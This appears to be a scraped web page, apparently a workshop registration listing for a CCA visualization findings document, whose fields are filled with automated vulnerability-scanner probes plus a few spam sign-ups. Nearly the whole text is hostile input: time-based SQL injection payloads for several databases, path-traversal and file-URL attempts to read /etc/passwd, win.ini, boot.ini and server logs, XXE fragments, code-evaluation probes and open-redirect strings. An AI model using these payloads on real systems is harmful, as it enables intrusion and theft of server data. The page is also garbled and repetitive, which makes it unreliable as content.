1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
c%3a%5cboot.ini
]>&lfi; 3 netsparker@example.com
Smith 3 ') WAITFOR DELAY '0:0:25'--
eval('print localtime()*0+0xFFF9999-22')
Smith netsparker@example.com
]>&lfi;
Smith c%3a%5cboot.ini netsparker@example.com
Smith 3 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
')) WAITFOR DELAY '0:0:25'--
Smith eval('print localtime()*0+0xFFF9999-22') netsparker@example.com
]>&lfi; 3 netsparker@example.com
Smith 3 ')) WAITFOR DELAY '0:0:25'--
'+print localtime()*0+0xFFF9999-22+'
]>&lfi;
1)) WAITFOR DELAY '0:0:25'--
/../../../../../../../../../../web.config
Smith '+print localtime()*0+0xFFF9999-22+' netsparker@example.com
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
Smith ]>&lfi; netsparker@example.com
"+print localtime()*0+0xFFF9999-22+"
Smith 3 (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
Smith /../../../../../../../../../../web.config netsparker@example.com
]>&lfi;
.r87.com/?
Smith "+print localtime()*0+0xFFF9999-22+" netsparker@example.com
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
Smith 3 1)) WAITFOR DELAY '0:0:25'--
/../../../../../../../../../../windows/win.ini
Smith ]>&lfi; netsparker@example.com
Smith .r87.com/? netsparker@example.com
Smith 3 '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith /../../../../../../../../../../windows/win.ini netsparker@example.com
http://r87.com/?
file:/windows/win.ini
Smith 3 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith 3 http://r87.com/?
response.write(268409241-22)'
]>&lfi;
Smith file:/windows/win.ini netsparker@example.com
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
//r87.com/?
Smith 3 response.write(268409241-22)'
Smith 3 ]>&lfi;
/../../../../../../../../../../windows/win.ini.cgi
Smith 3 //r87.com/?
]>&lfi;
+response.write(268409241-22)'
Smith /../../../../../../../../../../windows/win.ini.cgi netsparker@example.com
Smith 3 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith 3 ]>&lfi;
Smith 3 +response.write(268409241-22)'
http://r87.com/?
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
c:\windows\win.ini
Smith 3 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith c:\windows\win.ini netsparker@example.com
"+response.write(268409241-22)+"
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
....//....//....//....//....//....//....//....//....//....//....//windows\win.ini
Smith 3 http://r87.com/?
Smith 3 "+response.write(268409241-22)+"
Smith 3 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith ....//....//....//....//....//....//....//....//....//....//....//windows\win.ini netsparker@example.com
<% response.write(268409241-22) %>
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
/../../../../../../../../../../windows/iis6.log
r87.com/?
Smith 3 <% response.write(268409241-22) %>
Smith 3 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
Smith /../../../../../../../../../../windows/iis6.log netsparker@example.com
Smith 3 r87.com/?
print(int)0xFFF9999-22
((select sleep(25)))a-- 1
/\r87.com/?
/../../../../../../../../../../proc/self/fd/2
Smith 3 print(int)0xFFF9999-22
Smith 3 ((select sleep(25)))a-- 1
Smith 3 /\r87.com/?
Smith /../../../../../../../../../../proc/self/fd/2 netsparker@example.com
+print(int)0xFFF9999-22;//
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
///r87.com/?
/../../../../../../../../../../proc/self/fd/2.cgi
Smith 3 +print(int)0xFFF9999-22;//
Smith 3 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
Smith 3 ///r87.com/?
'+print(int)0xFFF9999-22+'
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
Smith /../../../../../../../../../../proc/self/fd/2.cgi netsparker@example.com
Smith 3 '+print(int)0xFFF9999-22+'
Smith 3 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
/../../../../../../../../../../etc/httpd/logs/error.log
"+print(int)0xFFF9999-22+"
Smith /../../../../../../../../../../etc/httpd/logs/error.log netsparker@example.com
Smith 3
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
Smith 3 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
/../../../../../../../../../../etc/httpd/logs/error_log
.r87.com/?
';SELECT pg_sleep(25)--
Smith /../../../../../../../../../../etc/httpd/logs/error_log netsparker@example.com
Smith 3 ';SELECT pg_sleep(25)--
Smith 3 .r87.com/?
Smith 3 "+print(int)0xFFF9999-22+"
/../../../../../../../../../../var/log/apache2/error.log
1;SELECT pg_sleep(25)--
Smith /../../../../../../../../../../var/log/apache2/error.log netsparker@example.com
Smith 3 1;SELECT pg_sleep(25)--
Smith 3
/../../../../../../../../../../var/log/apache/error.log
SELECT pg_sleep(25)--
{php}print(int)0xFFF9999-22;{/php}
Smith 3 SELECT pg_sleep(25)--
Smith /../../../../../../../../../../var/log/apache/error.log netsparker@example.com
Smith 3 {php}print(int)0xFFF9999-22;{/php}
1);SELECT pg_sleep(25)--
'{${print(int)0xFFF9999-22}}'
/../../../../../../../../../../proc/version
Smith 3 1);SELECT pg_sleep(25)--
Smith 3 '{${print(int)0xFFF9999-22}}'
');SELECT pg_sleep(25)--
Smith /../../../../../../../../../../proc/version netsparker@example.com
[php]print(int)0xFFF9999-22;[/php]
Smith 3 ');SELECT pg_sleep(25)--
/../../../../../../../../../../proc/version.cgi
Smith /../../../../../../../../../../proc/version.cgi netsparker@example.com
'));SELECT pg_sleep(25)--
Smith 3 [php]print(int)0xFFF9999-22;[/php]
print localtime()*0+0xFFF9999-22
/../../../../../../../../../../../etc/passwd
Smith 3 '));SELECT pg_sleep(25)--
Smith 3 print localtime()*0+0xFFF9999-22
Smith /../../../../../../../../../../../etc/passwd netsparker@example.com
1));SELECT pg_sleep(25)--
file:///etc/passwd
Smith 3 1));SELECT pg_sleep(25)--
eval('print localtime()*0+0xFFF9999-22')
Smith file:///etc/passwd netsparker@example.com
Smith 3 eval('print localtime()*0+0xFFF9999-22')
((SELECT 1 FROM (SELECT SLEEP(25))A))
/../../../../../../../../../../../etc/passwd
'+print localtime()*0+0xFFF9999-22+'
Smith 3 ((SELECT 1 FROM (SELECT SLEEP(25))A))
Smith /../../../../../../../../../../../etc/passwd netsparker@example.com
Smith 3 '+print localtime()*0+0xFFF9999-22+'
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
"+print localtime()*0+0xFFF9999-22+"
/../../../../../../../../../../../etc/passwd.cgi
Smith 3 '+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
Smith 3 "+print localtime()*0+0xFFF9999-22+"
Smith /../../../../../../../../../../../etc/passwd.cgi netsparker@example.com
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
....//....//....//....//....//....//....//....//....//....//....//etc/passwd
Smith 3 -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
Smith ....//....//....//....//....//....//....//....//....//....//....//etc/passwd netsparker@example.com
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
/../../../../../../../../../../../etc/passwd
Smith 3 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
Smith /../../../../../../../../../../../etc/passwd netsparker@example.com
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
/etc/passwd
Smith 3 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
Smith /etc/passwd netsparker@example.com
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Smith %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd netsparker@example.com
data:;base64,TlM3NzU0NTYxNDQ2NTc1
Smith data:;base64,TlM3NzU0NTYxNDQ2NTc1 netsparker@example.com
reg.cgi
Smith reg.cgi netsparker@example.com
reg.cgi
Smith reg.cgi netsparker@example.com
/Events/DiVA-July2004/reg.cgi
Smith /Events/DiVA-July2004/reg.cgi netsparker@example.com
/DiVA-July2004/reg.cgi
Smith /DiVA-July2004/reg.cgi netsparker@example.com
/../../../../../../../../../../boot.ini
Smith 3 /../../../../../../../../../../boot.ini
/../../../../../../../../../../boot.ini.cgi
Smith 3 /../../../../../../../../../../boot.ini.cgi
/../../../../../../../../../../boot.ini
Smith 3 /../../../../../../../../../../boot.ini
file:/boot.ini
Smith 3 file:/boot.ini
c:\boot.ini
Smith 3 c:\boot.ini
ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
Smith 3 ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
Smith 3 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
file%3a%2fboot.ini
Smith 3 file%3a%2fboot.ini
c%3a%5cboot.ini
Smith 3 c%3a%5cboot.ini
/../../../../../../../../../../web.config
Smith 3 /../../../../../../../../../../web.config
/../../../../../../../../../../windows/win.ini
Smith 3 /../../../../../../../../../../windows/win.ini
file:/windows/win.ini
Smith 3 file:/windows/win.ini
/../../../../../../../../../../windows/win.ini.cgi
Smith 3 /../../../../../../../../../../windows/win.ini.cgi
c:\windows\win.ini
Smith 3 c:\windows\win.ini
....//....//....//....//....//....//....//....//....//....//....//windows\win.ini
Smith 3 ....//....//....//....//....//....//....//....//....//....//....//windows\win.ini
/../../../../../../../../../../windows/iis6.log
Smith 3 /../../../../../../../../../../windows/iis6.log
/../../../../../../../../../../proc/self/fd/2
Smith 3 /../../../../../../../../../../proc/self/fd/2
/../../../../../../../../../../proc/self/fd/2.cgi
Smith 3 /../../../../../../../../../../proc/self/fd/2.cgi
/../../../../../../../../../../etc/httpd/logs/error.log
Smith 3 /../../../../../../../../../../etc/httpd/logs/error.log
/../../../../../../../../../../etc/httpd/logs/error_log
Smith 3 /../../../../../../../../../../etc/httpd/logs/error_log
/../../../../../../../../../../var/log/apache2/error.log
Smith 3 /../../../../../../../../../../var/log/apache2/error.log
/../../../../../../../../../../var/log/apache/error.log
Smith 3 /../../../../../../../../../../var/log/apache/error.log
/../../../../../../../../../../proc/version
Smith 3 /../../../../../../../../../../proc/version
/../../../../../../../../../../proc/version.cgi
Smith 3 /../../../../../../../../../../proc/version.cgi
/../../../../../../../../../../../etc/passwd
Smith 3 /../../../../../../../../../../../etc/passwd
file:///etc/passwd
Smith 3 file:///etc/passwd
/../../../../../../../../../../../etc/passwd
Smith 3 /../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../etc/passwd.cgi
Smith 3 /../../../../../../../../../../../etc/passwd.cgi
....//....//....//....//....//....//....//....//....//....//....//etc/passwd
Smith 3 ....//....//....//....//....//....//....//....//....//....//....//etc/passwd
/../../../../../../../../../../../etc/passwd
Smith 3 /../../../../../../../../../../../etc/passwd
/etc/passwd
Smith 3 /etc/passwd
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Smith 3 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
data:;base64,TlM3NzU0NTYxNDQ2NTc1
Smith 3 data:;base64,TlM3NzU0NTYxNDQ2NTc1
reg.cgi
Smith 3 reg.cgi
reg.cgi
Smith 3 reg.cgi
/Events/DiVA-July2004/reg.cgi
Smith 3 /Events/DiVA-July2004/reg.cgi
/DiVA-July2004/reg.cgi
Smith 3 /DiVA-July2004/reg.cgi
Smith 3 netsparker@example.com
hmptcbtn oMyrLOTgpnKgy mcavix@sltbte.com
Nuuxaztem JF Tech falameev.vasilij@mail.ru
vmhfch XayanwWItTCymPO rwiseq@katldn.com

Workshop Findings

This findings document is a record of what we attempted to do, what we actually did, and some observations and discussion about the efficacy of using CCA as the basis for visualization components.